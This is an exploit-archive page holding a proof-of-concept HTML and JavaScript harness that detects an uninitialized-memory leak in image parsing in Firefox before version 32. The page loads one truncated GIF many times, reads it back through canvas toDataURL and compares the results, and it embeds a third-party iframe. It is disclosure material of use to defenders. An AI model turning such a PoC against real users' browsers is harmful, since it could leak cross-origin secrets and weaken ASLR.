Mozilla Firefox Secret Leak PoC

2014.09.04
Credit: Michal Zalewski
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

The recent release of Firefox 32 fixes another interesting image parsing issue found by afl. Following a refactoring of memory management code, the past few versions of the browser ended up using uninitialized memory for certain types of truncated images, which is easily measurable with a simple <canvas> + toDataURL() harness that examines all the fuzzer-generated test cases. Depending on a variety of factors, problems like that may leak secrets across web origins, or more prosaically, may help attackers bypass security measures such as ASLR. This code is a proof of concept for versions prior to 32. <style> body { background-color: #d0d0d0; } img { border: 1px solid teal; margin: 1ex; } canvas { border: 1px solid crimson; margin: 1ex; } </style> <body onload="set_images()"> <div id="status"> </div> <div id="image_div"> </div> <canvas height=32 width=32 id=cvs> </canvas> <h2>Variants:</h2> <ul id="output"> </ul> <script> var c = document.getElementById('cvs'); var ctx = c.getContext('2d'); var loaded = 0; var image_obj = []; var USE_IMAGES = 300; function check_results() { var uniques = []; uniques.push(image_obj[0].imgdata); document.getElementById('output').innerHTML += '<img src="' + image_obj[0].imgdata + '">'; for (var i = 1; i < USE_IMAGES; i++) { if (image_obj[0].imgdata != image_obj[i].imgdata) { for (var j = 1; j < uniques.length; j++) if (uniques[j] == image_obj[i].imgdata) break; if (j == uniques.length) { uniques.push(image_obj[i].imgdata); document.getElementById('output').innerHTML += '<img src="' + image_obj[i].imgdata + '">'; } } } if (uniques.length > 1) alert('The image has ' + uniques.length + ' variants when rendered. Looks like you have a problem.'); else alert('The image has just one variant when rendered. You\'re probably OK.'); } function count_image() { loaded++; ctx.clearRect(0, 0, 32, 32); try { ctx.drawImage(this, 0, 0, 32, 32); } catch (e) { } this.imgdata = c.toDataURL(); if (loaded == USE_IMAGES) check_results(); } function set_images() { loaded = 0; create_images(); for (var i = 0; i < USE_IMAGES; i++) image_obj[i].src = './id:000110,src:000023.gif?' + Math.random(); } function create_images() { for (var i = 0; i < USE_IMAGES; i++) { image_obj[i] = new Image(); image_obj[i].height = 32; image_obj[i].width = 32; image_obj[i].onerror = count_image; image_obj[i].onload = count_image; document.getElementById('image_div').appendChild(image_obj[i]); } } </script> <iframe src='http://www.cnn.com/'></iframe>

References:

http://lcamtuf.blogspot.nl/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top